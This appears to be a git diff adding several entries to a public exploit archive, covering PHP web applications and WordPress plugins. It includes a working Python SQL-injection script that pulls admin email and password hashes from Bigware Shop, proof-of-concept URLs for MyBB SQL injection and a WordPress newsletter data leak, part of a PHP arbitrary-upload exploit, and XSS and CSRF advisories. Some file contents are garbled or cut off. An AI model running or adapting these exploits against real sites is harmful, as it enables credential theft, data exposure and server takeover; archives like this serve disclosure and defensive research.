b/platforms/php/webapps/37354.py new file mode 100755 index 000000000..891c331ba --- /dev/null +++ b/platforms/php/webapps/37354.py 
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/53810/info
+
+Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Bigware Shop versions prior to 2.17 are vulnerable.
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import httplib2
+import urllib
+import sys
+
+# insert your target link here (with trailing slash)
+url = "http://www.example.com/"
+h = httplib2.Http()
+
+# send sql injection
+headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
+sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
+ former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
+postdata = { 'voteid' : '2', \
+ 'pollid' : sqli, \
+ 'x' : '1', \
+ 'y' : '1', \
+ 'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'}
+response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
+print content, "\n", "\n"
+print "If there is an error stating the duplicate admin entry, your shop is vulnerable."
+
diff --git a/platforms/php/webapps/37355.txt b/platforms/php/webapps/37355.txt
new file mode 100755
index 000000000..129bf3e7e
--- /dev/null
+++ b/platforms/php/webapps/37355.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53814/info
+
+MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+MyBB 1.6.8 is vulnerable; other versions may also be affected.
+
+http://www.example.com/forums/member.php?action=profile&uid=[Sqli]
\ No newline at end of file
diff --git a/platforms/php/webapps/37356.txt b/platforms/php/webapps/37356.txt
new file mode 100755
index 000000000..5f2d8573a
--- /dev/null
+++ b/platforms/php/webapps/37356.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53850/info
+
+The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
+
+An attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
+
+Email Newsletter 8.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user
\ No newline at end of file
diff --git a/platforms/php/webapps/37357.php b/platforms/php/webapps/37357.php
new file mode 100755
index 000000000..5ad6bb71b
--- /dev/null
+++ b/platforms/php/webapps/37357.php
@@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/53851/info + +The VideoWhisper Video Presentation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +VideoWhisper Video Presentation 3.17 is vulnerable; other versions may also be affected. + +"@$uploadfile", + 'room'=>'./')); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; + +?> diff --git a/platforms/php/webapps/37360.txt b/platforms/php/webapps/37360.txt new file mode 100755 index 000000000..12a6f6ef6 --- /dev/null +++ b/platforms/php/webapps/37360.txt 
@@ -0,0 +1,95 @@ +# Exploit Title: Persistent XSS +# Google Dork: intitle: Persistent XSS +# Date: 2015-06-21 +# Exploit Author: John Page ( hyp3rlinx ) +# Website: hyp3rlinx.altervista.org +# Vendor Homepage: genixcms.org +# Software Link: genixcms.org +# Version: 0.0.3 +# Tested on: windows 7 +# Category: webapps + + +Vendor: +============================================= +genixcms.org + + + +Product: +===================================================== +GeniXCMS v0.0.3 is a PHP based content management system + + + +Advisory Information: +=================================================== +Multiple persistent & reflected XSS vulnerabilities + + + +Vulnerability Details: +========================================================= +GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS + + +XSS Exploit code(s): +==================== + +Persistent XSS: +----------------------- +http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token= + +1-content input field +content injected XSS will execute after posting is published + +2-title input field +title injected XSS will execute immediate. 
+ + +Relected XSS: +--------------------- +http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1' + + + +Disclosure Timeline: +========================================================= +Vendor Notification: NA +June 21, 2015 : Public Disclosure + + + +Severity Level: +========================================================= +Med + + + +Description: +========================================================= + +Request Method(s): [+] GET & POST + + +Vulnerable Product: [+] GeniXCMS 0.0.3 + + +Vulnerable Parameter(s): [+] q, content & title + + +Affected Area(s): [+] index.php + + +=============================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, provided that +it is not altered except by reformatting it, and that due credit is given. Permission is +explicitly given for insertion in vulnerability databases and similar, provided that +due credit is given to the author. The author is not responsible for any misuse of the +information contained herein and prohibits any malicious use of all security related +information or exploits by the author or elsewhere. + + +(hyp3rlinx) \ No newline at end of file diff --git a/platforms/php/webapps/37361.txt b/platforms/php/webapps/37361.txt new file mode 100755 index 000000000..5928e9e1d --- /dev/null +++ b/platforms/php/webapps/37361.txt 
@@ -0,0 +1,278 @@ +# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion +# Date: 2015-06-23 +# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/" +# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] +# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip +# Version: 2.7.5 +# Tested on: windows 7 ultimate + Firefox. +# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8 + +==================================================== + * CSRF + Persistent JS/HTML Injection +==================================================== + +===================== +DECRIPTION +===================== + +An attacker can make a user with access privileges to a page containing malicious script +and send some parameters injected JavaScript to the database. + +============================ +vulnerable POST parameters +============================ +//variables with variation names// + +order_by_[variation_number] +titleimage[variation_number] +sl_url[variation_number] +sl_link_target[variation_number] +im_description[variation_number] +imagess[variation_number] + +//variables with constant names// + +sl_pausetime +sl_changespeed + +=============== +EXPLOTATION +=============== + +variable numbers can be extracted from a published page containing the slider. and make all +parameters injected with code JS / HTML. + +------------------- +EXAMPLE +------------------- +[Extracting data for use] + +In a vulnerable site and has posted a slider, the malicious user can extract information +the attack is successful. + +----------------------------------------------------------------------------------------- +[variation_number] is a variable number that could be extracted as follows. +----------------------------------------------------------------------------------------- +The attacker sees the following framento source code of the page with slider: + + + +
[ <---SLIDER_ID_FOUND=2 ] +
+
+
+ +
+
+
+ +
+
+
+
+ + + +----------------------------------------------------------------------------------- +Classes tags [
] have a number at the end that is the id of the slider. +Also labeled [